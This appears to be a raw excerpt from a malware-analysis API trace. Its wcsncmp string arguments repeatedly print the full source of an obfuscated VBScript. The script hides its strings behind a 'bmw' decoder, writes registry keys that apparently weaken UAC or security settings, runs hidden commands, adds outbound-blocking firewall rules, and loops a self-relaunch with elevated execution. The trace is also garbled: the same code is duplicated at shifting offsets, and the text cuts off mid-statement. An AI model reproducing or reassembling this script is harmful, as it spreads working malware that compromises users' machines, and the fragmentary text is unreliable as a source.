bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 95 [0223.033] wcsncmp (_String1="e.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0223.033] wcsncmp (_String1=".LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 33 [0223.033] wcsncmp (_String1="LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 63 [0223.033] wcsncmp (_String1="ocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 98 [0223.033] wcsncmp (_String1="calPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 